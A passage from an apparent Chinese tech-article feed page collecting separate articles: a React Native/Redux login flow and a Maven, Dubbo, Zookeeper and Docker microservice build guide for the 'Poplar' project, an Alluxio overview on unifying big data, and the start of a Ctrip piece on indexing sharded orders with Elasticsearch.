在这个登录场景中,如上代码,LoginPage将自己的props与store和action绑定,如果登录成功,调用showLoginPage(false)action来隐藏自身,Reducer收到这个dispatch过来的action更新store状态:

//Action
export function showLoginPage(flag=true) {
  if(flag == true) {
    return {
      type: 'LOGIN_PAGE_VISIBLE'
    }
  } else {
    return {
      type: 'LOGIN_PAGE_INVISIBLE'
    }
  }
}

//Reducer
export function showLoginPage(state=pageState, action) {
  switch (action.type) {
    case 'LOGIN_PAGE_VISIBLE':
      return {
        ...state,
        loginPageVisible: true,
      }
      break;
    case 'LOGIN_PAGE_INVISIBLE':
      return {
        ...state,
        loginPageVisible: false,
      }
      break;
    default:
      return state;
  }
}

同时调用isLogin这个action更新应用的全局状态为已登录:

//Action
export function isLogin() {
  return dispatch => {
      Secret.isLogin((result, token) => {
        if(result) {
          dispatch({
            type: 'LOGGED_IN',
          });
        } else {
          dispatch({
            type: 'NOT_LOGGED_IN',
          });
        }
      });
  }
}

//Reducer
export function isLogin(state=loginStatus, action) {
    switch (action.type) {
      case 'LOGGED_IN':
        return {
          ...state,
          status: 'LOGGED_IN',
        }
        break;
      case 'NOT_LOGGED_IN':
        return {
          ...state,
          status: 'NOT_LOGGED_IN',
        }
        break;
      default:
        return state;
    }
}

App组件由于已经关联了这个全局的登录状态,在reducer更新了此状态之后,App也会收到该更新,进而重新渲染自己,此时MainPage就会渲染出来了:

const {status} = this.props;
return (
  <TabNavigator>
    <TabNavigator.Item
      selected={this.state.selectedTab === 'mainTab'}
      renderIcon={() => <Image style={styles.icon} 
                         source={require('./imgs/icons/home.png')} />}
      renderSelectedIcon={() => <Image style={styles.icon} 
                          source={require('./imgs/icons/home_selected.png')} />}
      onPress={() => {
                      this.setState({ selectedTab: 'mainTab' });
                      if(status == 'NOT_LOGGED_IN') {
                        showLoginPage();
                      }
                  }
               }
    >
	  //全局状态已由NOT_LOGGED_IN变为LOGGED_IN
      {status == 'NOT_LOGGED_IN'?<LoginPage {...this.props}/>:<MainPage {...this.props}/>}

framework

项目构建 & 开发

1. 项目结构

project

poplar作为一个整体Maven项目,顶层不具备业务功能也不包含代码,对下层提供基础的pom依赖导入
poplar-api有着两重身份:API网关接收渠道层请求路由转发、作为微服务消费者组织提供者服务调用完成服务串联
poplar-user-service: 微服务提供者,提供注册、登录、用户管理等服务
poplar-feed-service: 微服务提供者,提供feed创建、生成信息流等服务
poplar-notice-service: 微服务提供者, 提供通知消息服务

每个子项目以Module方式单独创建 module

2. Maven聚合项目

Poplar由多个服务提供者、消费者和公共组件构成,他们之间的依赖关系既有关联关系又有父子从属关系, 为了简化配置也便于统一构建,需要建立合理的依赖。服务的提供者主要是Spring Boot项目,兼有数据库访问等依赖;服务的消费者同样是是Spring Boot项目,但由于是API层,需要对外提供接口,所以需要支持Controller; 服务消费者、提供者通过Dubbo完成调用,这也需要共用的Dubbo组件,所以我们可以发现消费者、提供者共同依赖Spring Boot以及Dubbo,抽离出一个parent的pom即可,定义公共的父组件:

<groupId>com.lvwangbeta</groupId>
<artifactId>poplar</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>pom</packaging>

<name>poplar</name>
<description>Poplar</description>
<dependencies>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-data-redis</artifactId>
    </dependency>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-jdbc</artifactId>
    </dependency>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-web</artifactId>
    </dependency>    
    ...
</dependencies>

Poplar父组件除了引入公共的构建包之外,还需要声明其包含的子组件,这样做的原因是在Poplar顶层构建的时候Maven可以在反应堆计算出各模块之间的依赖关系和构建顺序。我们引入服务提供者和消费者:

 <modules>
    <module>poplar-common</module>
    <module>poplar-api</module>
    <module>poplar-feed-service</module>
    <module>poplar-user-service</module>
</modules>

子组件的pom结构就变的简单许多了,指定parent即可,pom源为父组件的相对路径

<groupId>com.lvwangbeta</groupId>
<artifactId>poplar-api</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>war</packaging>

<name>poplar-api</name>
<description>poplar api</description>

<parent>
    <groupId>com.lvwangbeta</groupId>
    <artifactId>poplar</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <relativePath>../pom.xml</relativePath> <!-- lookup parent from repository -->
</parent>   

还有一个公共构建包我们并没有说,它主要包含了消费者、提供者共用的接口、model、Utils方法等,不需要依赖Spring也没有数据库访问的需求,这是一个被其他项目引用的公共组件,我们把它声明为一个package方式为jar的本地包即可,不需要依赖parent:

<groupId>com.lvwangbeta</groupId>
<artifactId>poplar-common</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>jar</packaging>

在项目整体打包的时候,Maven会计算出其他子项目依赖了这个本地jar包就会优先将其打入本地Maven库。 在Poplar项目根目录执行mvn clean install查看构建顺序,可以看到各子项目并不是按照我们在Poplar-pom中定义的那样顺序执行的,而是Maven反应堆计算各模块的先后依赖来执行构建,先构建公共依赖common包然后构建poplar,最后构建各消费者、提供者。

[INFO] Reactor Summary:
[INFO]
[INFO] poplar-common ...................................... SUCCESS [ 3.341 s]
[INFO] poplar ............................................. SUCCESS [ 3.034 s]
[INFO] poplar-api ......................................... SUCCESS [ 25.028 s]
[INFO] poplar-feed-service ................................ SUCCESS [ 6.451 s]
[INFO] poplar-user-service ................................ SUCCESS [ 8.056 s]
[INFO] ------------------------------------------------------------------

如果我们只修改了某几个子项目,并不需要全量构建,只需要用Maven的-pl选项指定项目同时-am构建其依赖的模块即可,我们尝试单独构建poplar-api这个项目,其依赖于poplar-common和poplar:

mvn clean install -pl poplar-api -am  

执行构建发现Maven将poplar-api依赖的poplar-common和poplar优先构建之后再构建自己:

[INFO] Reactor Summary:
[INFO] [INFO] poplar-common ...................................... SUCCESS [ 2.536 s]
[INFO] poplar ............................................. SUCCESS [ 1.756 s]
[INFO] poplar-api ......................................... SUCCESS [ 28.101 s]
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS

3. Dubbo & Zookeeper

上面所述的服务提供者和消费者依托于Dubbo实现远程调用,但还需要一个注册中心,来完成服务提供者的注册、通知服务消费者的任务,Zookeeper就是一种注册中心的实现,poplar使用Zookeeper作为注册中心。

3.1 Zookeeper安装

下载解压Zookeeper文件

$ cd zookeeper-3.4.6  
$ mkdir data  

创建配置文件

$ vim conf/zoo.cfg

tickTime = 2000
dataDir = /path/to/zookeeper/data
clientPort = 2181
initLimit = 5
syncLimit = 2

启动

$ bin/zkServer.sh start

停止

$ bin/zkServer.sh stop 

3.2 Dubbo admin

Dubbo管理控制台安装

git clone https://github.com/apache/incubator-dubbo-ops
cd incubator-dubbo-ops && mvn package  

然后就可以在target目录下看到打包好的war包了,将其解压到tomcatwebapps/ROOT目录下(ROOT目录内容要提前清空),可以查看下解压后的dubbo.properties文件,指定了注册中心Zookeeper的IP和端口

dubbo.registry.address=zookeeper://127.0.0.1:2181
dubbo.admin.root.password=root
dubbo.admin.guest.password=guest

启动tomcat

./bin/startup.sh 	

访问

http://127.0.0.1:8080/   

这样Dubbo就完成了对注册中心的监控设置

dubbo-admin

4. 开发

微服务的提供者和消费者开发模式与以往的单体架构应用虽有不同,但逻辑关系大同小异,只是引入了注册中心需要消费者和提供者配合实现一次请求,这就必然需要在两者之间协商接口和模型,保证调用的可用。

文档以用户注册为例展示从渠道调用到服务提供者、消费者和公共模块发布的完整开发流程。

4.1 公共

poplar-common作为公共模块定义了消费者和提供者都依赖的接口和模型, 微服务发布时才可以被正常访问到
定义用户服务接口

public interface UserService {
    String register(String username, String email, String password);
}

4.2 服务提供者

UserServiceImpl实现了poplar-common中定义的UserService接口

@Service
public class UserServiceImpl implements UserService {

    @Autowired
    @Qualifier("userDao")
    private UserDAO userDao;

    public String register(String username, String email, String password){
        if(email == null || email.length() <= 0)
            return Property.ERROR_EMAIL_EMPTY;

        if(!ValidateEmail(email))
            return Property.ERROR_EMAIL_FORMAT;
        ...
    }

可以看到这就是单纯的Spring BootService写法,但是@Service注解一定要引入Dubbo包下的,才可以让Dubbo扫描到该Service完成向Zookeeper注册:

dubbo.scan.basePackages = com.lvwangbeta.poplar.user.service

dubbo.application.id=poplar-user-service
dubbo.application.name=poplar-user-service

dubbo.registry.address=zookeeper://127.0.0.1:2181

dubbo.protocol.id=dubbo
dubbo.protocol.name=dubbo
dubbo.protocol.port=9001

4.3 服务消费者

前面已经说过,poplar-api作为API网关的同时还是服务消费者,组织提供者调用关系,完成请求链路。

API层使用@Reference注解来向注册中心请求服务,通过定义在poplar-common模块中的UserService接口实现与服务提供者RPC通信

@RestController
@RequestMapping("/user")
public class UserController {

    @Reference
    private UserService userService;

    @ResponseBody
    @RequestMapping("/register")
    public Message register(String username, String email, String password) {
        Message message = new Message();
        String errno = userService.register(username, email, password);
        message.setErrno(errno);
        return message;
    }
} 

application.properties配置

dubbo.scan.basePackages = com.lvwangbeta.poplar.api.controller

dubbo.application.id=poplar-api
dubbo.application.name=poplar-api

dubbo.registry.address=zookeeper://127.0.0.1:2181 

5.服务Docker化

如果以上步骤都已做完,一个完整的微服务架构基本已搭建完成,可以开始coding业务代码了,为什么还要再做Docker化改造?首先随着业务的复杂度增高,可能会引入新的微服务模块,在开发新模块的同时提供一个稳定的外围环境还是很有必要的,如果测试环境不理想,可以自己启动必要的docker容器,节省编译时间;另外减少环境迁移带来的程序运行稳定性问题,便于测试、部署,为持续集成提供更便捷、高效的部署方式。

在poplar根目录执行build.sh可实现poplar包含的所有微服务模块的Docker化和一键启动:

cd poplar && ./build.sh

如果你有耐心,可看下如下两个小章节,是如何实现的

5.1 构建镜像

Poplar采用了将各微服务与数据库、注册中心单独Docker化的部署模式,其中poplar-dubbo-admin是dubbo管理控制台,poplar-apipoplar-tag-servicepoplar-action-servicepoplar-feed-servicepoplar-user-service是具体的服务化业务层模块,poplar-redispoplar-mysql提供缓存与持久化数据支持,poplar-zookeeper为Zookeeper注册中心

poplar-dubbo-admin
poplar-api
poplar-tag-service
poplar-action-service
poplar-feed-service
poplar-user-service
poplar-redis
poplar-mysql
poplar-zookeeper

poplar-apipoplar-tag-servicepoplar-action-servicepoplar-feed-servicepoplar-user-service业务层模块可以在pom.xml中配置docker-maven-plugin插件构建,在configuration中指定工作目录、基础镜像等信息可省去Dockerfile:

<plugin>
    <groupId>com.spotify</groupId>
    <artifactId>docker-maven-plugin</artifactId>
    <version>1.0.0</version>
    <configuration>
        <imageName>lvwangbeta/poplar</imageName>
        <baseImage>java</baseImage>
        <maintainer>lvwangbeta lvwangbeta@163.com</maintainer>
        <workdir>/poplardir</workdir>
        <cmd>["java", "-version"]</cmd>
        <entryPoint>["java", "-jar", "${project.build.finalName}.jar"]</entryPoint>
        <skipDockerBuild>false</skipDockerBuild>
        <resources>
            <resource>
                <targetPath>/poplardir</targetPath>
                <directory>${project.build.directory}</directory>
                <include>${project.build.finalName}.jar</include>
            </resource>
        </resources>
    </configuration>
</plugin>

如果想让某个子项目不执行docker构建,可设置子项目pom.xml的skipDockerBuild为true,如poplar-common为公共依赖包,不需要单独打包成独立镜像:

<skipDockerBuild>true</skipDockerBuild>

在poplar项目根目录执行如下命令,完成整个项目的业务层构建:

mvn package -Pdocker  -Dmaven.test.skip=true docker:build
[INFO] Building image lvwangbeta/poplar-user-service
Step 1/6 : FROM java
 ---> d23bdf5b1b1b
Step 2/6 : MAINTAINER lvwangbeta lvwangbeta@163.com
 ---> Running in b7af524b49fb
 ---> 58796b8e728d
Removing intermediate container b7af524b49fb
Step 3/6 : WORKDIR /poplardir
 ---> e7b04b310ab4
Removing intermediate container 2206d7c78f6b
Step 4/6 : ADD /poplardir/poplar-user-service-2.0.0.jar /poplardir/
 ---> 254f7eca9e94
Step 5/6 : ENTRYPOINT java -jar poplar-user-service-2.0.0.jar
 ---> Running in f933f1f8f3b6
 ---> ce512833c792
Removing intermediate container f933f1f8f3b6
Step 6/6 : CMD java -version
 ---> Running in 31f52e7e31dd
 ---> f6587d37eb4d
Removing intermediate container 31f52e7e31dd
ProgressMessage{id=null, status=null, stream=null, error=null, progress=null, progressDetail=null}
Successfully built f6587d37eb4d
Successfully tagged lvwangbeta/poplar-user-service:latest
[INFO] Built lvwangbeta/poplar-user-service
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------

5.2 启动运行容器

由于poplar包含的容器过多,在此为其创建自定义网络poplar-netwotk

docker network create --subnet=172.18.0.0/16 poplar-network

运行以上构建的镜像的容器,同时为其分配同网段IP

启动Zookeeper注册中心

docker run --name poplar-zookeeper --restart always -d  --net poplar-network --ip 172.18.0.6  zookeeper 

启动MySQL

docker run --net poplar-network --ip 172.18.0.8  --name poplar-mysql -p 3307:3306 -e MYSQL_ROOT_PASSWORD=123456 -d  lvwangbeta/poplar-mysql

启动Redis

docker run --net poplar-network --ip 172.18.0.9 --name poplar-redis -p 6380:6379 -d redis

启动业务服务

docker run --net poplar-network --ip 172.18.0.2 --name=poplar-user-service -p 8082:8082 -t lvwangbeta/poplar-user-service

docker run --net poplar-network --ip 172.18.0.3 --name=poplar-feed-service -p 8083:8083 -t lvwangbeta/poplar-feed-service

docker run --net poplar-network --ip 172.18.0.4 --name=poplar-action-service -p 8084:8084 -t lvwangbeta/poplar-action-service

docker run --net poplar-network --ip 172.18.0.10 --name=poplar-api -p 8080:8080 -t lvwangbeta/poplar-api

dockerps

至此,poplar项目的后端已完整的构建和启动,对外提供服务,客户端(无论是Web还是App)看到只有一个统一的API。


          使用 Alluxio 统一结构化大数据      Cache   Translate Page   Web Page Cache   

理解在分析存储于数据仓库的结构化大数据时Alluxio所带来的益处。

  • 使用配置来整合数据存储,而不是ETL

  • 在文件系统和对象存储之间统一大数据文件

  • 对重要和经常使用的数据提供按需快速本地访问,不保留永久副本

  • 通过删除数据副本和将数据迁移到商用存储来降低存储成本

1. 摘要

问题描述:对存储在不同仓库中的结构化大数据进行分析是大型企业面临的挑战

  • 许多大型企业都有结构化大数据,这些数据通过多种存储技术如HDFS、对象存储和NFS等被存储在不同的仓库中。

  • 商业用户需要通过这些仓库访问数据来执行高性能的查询并获得有意义的洞察力。

传统方法:数据湖

  • 数据湖是解决这个问题的传统方法,它提供一个单一系统,可以访问相关数据。

  • 传统方式创建的数据湖是资源密集型,需要代价很高的永久数据拷贝并且在数据创建和分析之间造成了延迟。

  • 随着时间的推移,业务线可能会创建各自独立的数据湖,从而创建了使用不兼容的存储技术实现的数据仓库。

  • 大型企业也可能会部署一种“数据湖的数据湖”,以便在多个业务线之间访问数据,从而创建另一个数据副本。

  • 团队可能会不断尝试新的存储和计算技术,从而增加了数据管理的难度。

新方案:Alluxio虚拟分布式文件系统

  • Alluxio是第一个在文件系统和对象存储之间统一大数据文件的虚拟化存储技术。

  • 作为一个“虚拟数据湖”,应用程序可以访问在Alluxio全局命名空间中的文件,就好像这些文件在一个传统的Hadoop文件系统或对象存储中一样。

  • Alluxio提供了按需快速本地访问重要和频繁使用的数据,不需要维护一个永久的副本。缓存的只是数据块,而不是整个文件。

  • 企业可以通过将更多的数据迁移到商用存储中来减少存储开销。

  • 底层存储通过使用配置而不是ETL来整合。数据存在它的源系统中,有效地消除了过时数据的问题。

  • 开发者使用工业标准接口(包括HDFS和S3A)与Alluxio进行交互。Alluxio系统的插件化架构能够支持未来的出现的接口访问技术。

  • 可扩展性、灵活性、安全性和容错性已经在系统中被原生地设计出来了。

SQL代码示例:包括一个技术示例,用于在跨多个存储集群的表中使用Spark SQL执行和持久化SQL join。

2. 介绍

随着数据量的增长,大型企业正在采用大数据技术来处理涉及PetaByte规模的结构化和非结构化数据。大数据通常存储在许多系统和业务单元中。企业要求技术团队以高性能和成本有效的方式在这些系统中提供统一的、聚合的数据视图。

这篇文章介绍了Alluxio和它如何独特地解决了结构化大数据统一管理和访问的难题。

3. 统一大数据的传统方法

当大型企业不能保证其大数据存在于一个单源系统或数据湖中时,企业就需要解决大数据统一访问的难题。这通常是通过自定义应用层解决方案或创建数据湖来解决的。事实上,这些解决方案通常会很困难:

自定义解决方案

  • 需要编写和维护自定义的应用层代码,这项工作是劳动密集型的并且易于中断。

  • 没有缓存,这对于提升查询性能是一个重要的障碍。

传统的数据湖

  • 传统的数据湖是资源密集型的,并且需要维护永久的数据副本,这是非常昂贵的。

  • 每次复制数据时,都会引入延迟,而且用于分析的数据的版本不一定是最新的。

  • 随着时间的推移,业务线可能会创建各自独立的数据湖,从而创建了使用不兼容的存储技术实现的数据仓库。

image

4. 统一大数据——Alluxio之道

Alluxio是世界上第一个内存级速度的虚拟分布式文件系统。它统一了数据访问并且连接了计算框架和底层的存储系统。应用程序只需要连接到Alluxio就可以访问存储在任何底层存储系统中的数据。此外,Alluxio架构能够以内存速度访问数据,提供了最快的I/O。

在大数据生态系统中,Alluxio位于计算和存储中间。它可以为生态系统带来显著的性能提升,尤其是跨数据中心和可用性区域。Alluxio是Hadoop和对象存储兼容的,并且支持对底层存储进行读写。现有的数据分析应用程序,如Hive、HBASE和Spark SQL,可以在不更改任何代码的情况下运行在Alluxio上。

Alluxio的益处

  • 统一访问:充当一个“虚拟数据湖”。文件可以在Alluxio全局命名空间中被访问,就好像它们存储在一个单系统中。

  • 性能:对重要频繁使用的数据提供快速本地访问,而不需要维护所有数据的永久副本。Alluxio只智能地缓存所需的数据块,而不是整个文件。

  • 灵活性:Alluxio中的数据可以在不同的工作负载之间被共享,不仅是查询还可以用于批量分析,机器学习和深度学习。

  • 存储开销最优化:透明地从源系统直接读写数据,因此不需要创建永久的数据副本。Alluxio的内置缓存可以:

  • 利用计算节点上未使用的RAM和磁盘存储来减少硬件开销。

  • 使企业能够将更多的数据迁移到更低成本的商用存储中。

  • 配置驱动:使用配置整合底层存储,而不是ETL。

  • 更现代灵活的架构:促进计算和存储的分离。即插即用的系统架构能够支持未来的技术。

  • 没有产商锁定:支持工业标准接口,包括HDFS和S3A。

  • 维护企业数据安全和管理:与现有的企业系统集成以支持统一的数据管理。

image

Alluxio提供的创新功能

全局命名空间:用户以一个单机虚拟文件系统中的挂载点的方式与底层存储进行交互,从而简化了访问。

服务器端API转换:用户通过HDFS或S3A来与Alluxio进行通信。但是,底层存储系统不需要本地支持HDFS或S3A。任何具有兼容接口的存储系统都可以作为底层存储被挂载,并且Alluxio使得服务器端API和应用程序选择的接口的转换变得容易。通过Alluxio的模块化架构也可以添加新的自定义接口。Alluxio的转换能力提升了你的企业架构的互通性并且简化了开发。

兼容的底层存储接口:HDFS,NFS,Amazon S3A,Azure Blob Storage或Google Cloud Storage。

带内缓存:缓存对用户是带内或透明的,并使用集中管理策略进行控制。用户不需要付出任何努力就可以从改进的性能中获益,并且管理是有组织地进行维护。

样本用例:

在这个示例企业中,与客户交互相关的所有数据位于两个不同的系统中:销售系统包含客户所购买的所有产品的信息,客户支持系统包含客户记录的所有支持案例信息。这两个系统是相互孤立的,但是为了了解客户的所有交互情况,必须联合这两个孤立系统进行查询,并将结果以客户视图的方式提供给用户。

统一SQL查询:一个示例

一旦底层存储系统通过Alluxio进行统一后,SQL引擎就可以和底层表进行交互,就好像它们是单个系统的一部分一样。

在下面的示例中,Spark SQL将加载来自不同集群的两张表,这些表位于Alluxio的”/mnt/a”和“/mnt/b”中并且将结果写入“/mnt/c”中的第三个集群。

image

5. 性能和存储成本

大多数情况下,在一次分析中一个语料库中只有一部分数据被使用。这个比例通常不到20%。传统地,企业必须在对重要且经常使用的数据提供快速访问和对所有数据提供统一访问之间进行权衡,这会增加技术预算的重大成本。

Alluxio在允许对企业数据进行有效统一访问的同时,也提供了按需快速本地访问分析使用的数据。作为一个虚拟文件系统,Alluxio的全局命名空间允许用户浏览并与被挂载系统中的文件元数据进行交互。但是,只有当用户需要它时才会访问数据,并且可以透明地缓存已请求的文件数据。这种即时的设计理念使Alluxio能够同时解决性能和成本方面的难题。

设计挑战和缓存

在设计高性能大数据架构时,必须解决现代基础设施的两个现实问题:

当对性能有需求时,Alluxio会用它的本地智能缓存来解决数据局部性和低成本存储的难题。

缓存的管理方式有两种:

管理员决定Alluxio可用的缓存空间大小来提供性能比的最佳成本,而智能策略将透明地管理留在缓存空间中的数据。当缓存空间满时,数据访问继续正常进行,而智能缓存优先处理数据。

使用Alluxio的完全集成缓存,应用程序用户能够以一种透明的方式高速地访问来自远程或缓慢存储系统的数据,同时允许企业控制存储成本。

分层缓存

Alluxio可以并存在数据中心或计算和作业执行的可用性区域中,并且可以安装在现有的计算节点、专用节点或两者结合。Alluxio的缓存可以设置为RAM、SSD和HDD,通过配置为其预留空间。

用户定义用于固定、多层升级/降级和TTL的策略。例如,一种常见的分层方法是:

imageimage

默认情况下,数据被缓存到顶层,并根据需要将数据驱逐到下一层。管理员可以控制这些全局策略,还可以在底层存储中设置定制的缓存策略,从而更好地控制了Alluxio的存储资源。如果授权,用户也可以每次请求都指定缓存覆盖。

存储成本优化

由于性能和互用性的考虑,现在CIOs通常必须选择昂贵的存储技术,而不是成本更低的替代方案。

通过使用Alluxio,CIOs可以加速企业存档策略,将更多的数据转到低成本的存储技术。

  • Alluxio的智能缓存提供了数据局部性,以克服低成本存储的典型低性能。

  • 当被挂载到Alluxio中,利用HDFS或S3A接口进行数据访问的应用程序可以访问那些本地不支持这些接口的存储技术。

  • 数据可以在存储系统之间移动,而不需要在应用层进行任何的改变。

6. 企业级的考虑

PetaByte规模的数据

大多数大型企业都有PetaByte规模的结构化大数据。通常看到的逻辑大数据表都是TeraByte规模的。为了改进操作,这些大表通常被划分为表分区文件。大数据存储系统(例如,HDFS和对象存储)将大型文件分割成MegaByte规模的数据块。数据块级存储允许对大数据文件进行细粒度控制并且最小化整个网络的数据流。Alluxio被设计成可以和HDFS和对象存储无缝地工作,并且只透明地返回满足请求所需的块。这保证了不会以I/O瓶颈或大规模数据移动为代价进行数据统一。

元数据的管理

Alluxio共享了一个在领先的大数据系统如HDFS和对象存储中常见的基础设计假设,即数据是不可变的,也就是说,它们一旦被写入,就永远不会被修改。不可变数据允许系统突破随机写入需求所造成的规模限制。Alluxio引入了不可变数据以确保元数据与底层存储的同步是一种低开销操作。当新文件被写入时,如果通过Alluxio来添加,可以立即使用它们。文件如果被添加到Alluxio外的底层存储时,将根据用户定义的元数据刷新策略来与Alluxio同步。在这两种情况下,Alluxio中的元数据都保持同步,从而简化了用户的数据访问。

安全性

对于大型企业来说,数据安全性是极其重要的。除了数据统一管理访问之外,Alluxio还可以作为跨多个存储系统的统一安全层。

用户身份认证

在一个具有统一身份服务的企业中,Alluxio简单地认为服务是真理的来源,并且不负责在多个服务之间统一身份。身份服务如LDAP,通过不同的身份认证和IAM协议连接到不同的存储库中。

如果一个企业组织没有统一的身份认证服务,Alluxio会提供一个灵活的凭证管理方法,以实现多个底层存储的安全连接。在Alluxio中,用户身份认证是通过Kerberos实现的,这与底层存储身份认证是分离的,而是使用底层存储支持的身份认证方法实现的。

访问控制

Alluxio提供了一个类似于当前POSIX-compliant模型的统一访问控制模型。此外,它还添加了类UNIX的访问控制列表(ACLs)来支持任何用户或组的细粒度权限控制。

如果用户在LDAP身份存储中进行管理,Alluxio也可以与Active Directory和LDAP进行集成,以查询用户的组成员身份并实现访问控制。

当访问远程安全的Hadoop集群中的数据时,Alluxio支持HDFS用户模拟,这是一种安全的最佳实践。通过模拟,Alluxio可以代表客户端请求数据访问。这使得Hadoop集群能够维护完整的用户授权,并使Alluxio成为一个透明的数据代理。管理员使用现有的Hadoop工具如Cloudera Sentry和Apache Ranger来管理安全性。

加密

Alluxio支持挂载加密的数据源。由于Alluxio本身对数据块中的具体内容不作语义结构感知,所以加密的数据不会影响Alluxio的核心操作。

例如,如果一个SQL引擎需要访问加密的HDFS数据,Alluxio会模拟客户端的用户并代表用户请求访问。一旦授权,数据将被解密并以正常的形式返回给用户。如果同时启用了缓存,数据将以未加密的方式存储的Alluxio中。还可以启用Kerberos以进一步安全访问。

如果数据还没有在底层存储中加密,或者如果缓存在Alluxio需要加密,Alluxio也会代表客户端应用支持加密/解密。即使加密不是由存储系统本身进行全局配置的,也可以将由Alluxio加密的数据存储回底层存储中。

灵活性&集中性

许多大型企业都希望利用灵活性和集中性来优化它们的资源使用。为了实现这种转变,应用程序堆栈正在被重新设计,以分离计算和存储。Alluxio的设计促进了这种分离的关注。

系统本身也被设计成可以随着资源需求的变化而上下伸缩,并且可以通过中间层的合作关系与中间层DC/OS和Kubernetes等企业资源管理人员一起使用。在这些环境下,可以使用Alluxio来统一驻留在这些集群之外的数据。

容错

Alluxio是一个具有内置容错功能的分布式可扩展系统。任何组件都没有单点故障,并且在一个组件崩溃的情况下,也不会有数据丢失。建议使用多master方法来部署Alluxio。

底层存储也可以通过Alluxio底层存储复制特性来复制,这一特性支持Alluxio集群之外的高可用性需求。

7. 结论

随着大型企业努力应对日益增长的大规模数据、越来越多的存储技术和激增的应用程序,大数据的统一正成为使用传统方法管理的难题。

Alluxio是第一个将大数据统一起来的存储虚拟化技术,不需要拥有自己的永久副本并且充当一个“虚拟数据湖”。应用程序使用工业标准接口和一个全局命名空间访问Alluxio中的文件,就像这些文件在一个传统的数据湖中一样。Alluxio独特之处在于底层存储的集成是通过配置完成而不是通过ETL进行,并且数据驻留在它的源系统中,有效地消除了陈旧的数据。

Alluxio将更多的数据迁移到低成本的存储中,并且提供快速本地访问重要且频繁使用的数据,从而允许企业优化存储成本。所有的这些都是在可扩展的、安全和容错的分布式系统中实现的。


          干货 | 携程酒店订单Elastic Search实战      Cache   Translate Page   Web Page Cache   
作者简介 

刘诚,携程酒店研发部技术专家。2014年加入携程,先后负责了订单处理多个项目的开发工作,擅长解决各种生产性能问题。

业务场景

image


随着订单量的日益增长,单个数据库的读写能力开始捉襟见肘。这种情况下,对数据库进行分片变得顺理成章。分片之后的写,只要根据分片的维度进行取模即可。可是多维度的查询应该如何处理呢?

一片一片的查询,然后在内存里面聚合是一种方式。可是缺点显而易见,对于那些无数据返回分片的查询,不仅对应用服务器是一种额外的性能消耗,对宝贵的数据库资源也是一种不必要的负担。

至于查询性能,虽然可以通过开线程并发查询进行改善,但是多线程编程以及对数据库返回结果的聚合,增加了编程的复杂性和易错性。可以试想一下分片后的分页查询如何实现,便可有所体会。

所以我们选择对分片后的数据库建立实时索引,把查询收口到一个独立的web service,在保证性能的前提下,提升业务应用查询时的便捷性。那问题就来了,如何建立高效的分片索引呢?


索引技术的选型

image


实时索引的数据会包含常见查询中所用到的列,例如用户ID,用户电话,用户地址等,实时复制分发一份到一个独立的存储介质上。查询时,会先查索引,如果索引中已经包含所需要的列,直接返回数据即可。如果需要额外的数据,可以根据分片维度进行二次查询。因为已经能确定具体的分片,所以查询也会高效。


为什么没有使用数据库索引

image


数据库索引是一张表的所选列的数据备份。

由于得益于包含了低级别的磁盘块地址或者直接链接到原始数据的行,查询效率非常高效。优点是数据库自带的索引机制是比较稳定可靠且高效的。缺陷是随着查询场景的增多,索引的量会随之上升。

订单自身的属性随着业务的发展已经达到上千,高频率查询的维度可多达几十种,组合之后的变形形态可达上百种。而索引本身并不是没有代价的,每次增删改都会有额外的写操作,同时占用额外的物理存储空间。索引越多,数据库索引维护的成本越大。所以还有其他选择么?


开源搜索引擎的选择

image


当时闪现在我们脑中的是开源搜索引擎Apache Solr和Elastic Search。

Solr是一个建立在JAVA 类库Lucene之上的开源搜索平台。以一种更友好的方式提供Lucene的搜索能力。已经存在十年之久,是一款非常成熟的产品。提供分布式索引、复制分发、负载均衡查询,自动故障转移和恢复功能。

Elastic Search也是一个建立在Lucene之上的分布式RESTful搜索引擎。通过RESTful接口和Schema Fee JSON文档,提供分布式全文搜索引擎。每个索引可以被分成多个分片,每个分片可以有多个备份。

两者对比各有优劣。在安装和配置方面,得益于产品较新,Elastic Search更轻量级以及易于安装使用。在搜索方面,撇开大家都有的全文搜索功能,Elastic Search在分析性查询中有更好的性能。在分布式方面,Elastic Search支持在一个服务器上存在多个分片,并且随着服务器的增加,自动平衡分片到所有的机器。社区与文档方面,Solr得益于其资历,有更多的积累。

根据Google Trends的统计,Elastic Search比Solr有更广泛的关注度。

image

最终我们选择了Elastic Search,看中的是它的轻量级、易用和对分布式更好的支持,整个安装包也只有几十兆。


复制分发的实现

image

为了避免重复造轮子,我们尝试寻找现存组件。由于数据库是SQL Server的,所以没有找到合适的开源组件。SQL Server本身有实时监控增删改的功能,把更新后的数据写到单独的一张表。但是它并不能自动把数据写到Elastic Search,也没有提供相关的API与指定的应用进行通讯,所以我们开始尝试从应用层面去实现复制分发。


为什么没有使用数据访问层复制分发

image

首先进入我们视线是数据访问层,它可能是一个突破口。每当应用对数据库进行增删改时,实时写一条数据到Elastic Search。但是考虑到以下情况后,我们决定另辟蹊径:

  • 每次增删改时都写Elastic Search,意味着业务处理逻辑与复制分发强耦合。Elastic Search或相关其他因素的不稳定,会直接导致业务处理的不稳定。异步开线程写Elastic Search?那如何处理应用发布重启的场景?加入大量异常处理和重试的逻辑?然后以JAR的形式引用到几十个应用?一个小bug引起所有相关应用的不稳定?


实时扫描数据库

image


初看这是一种很低效的方案,但是在结合以下实际场景后,它却是一种简单、稳定、高效的方案:

  • 零耦合。相关应用无需做任何改动,不会影响业务处理效率和稳定性。

  • 批量写Elastic Search。由于扫描出来的都是成批的数据,可以批量写入Elastic Search,避免Elastic Search由于过多单个请求,频繁刷新缓存。

  • 存在大量毫秒级并发的写。扫描数据库时无返回数据意味着额外的数据库性能消耗,我们的场景写的并发和量都非常大,所以这种额外消耗可以接受。

  • 不删除数据。扫描数据库无法扫描出删除的记录,但是订单相关的记录都需要保留,所以不存在删除数据的场景。


提高Elastic Search写的吞吐量

image


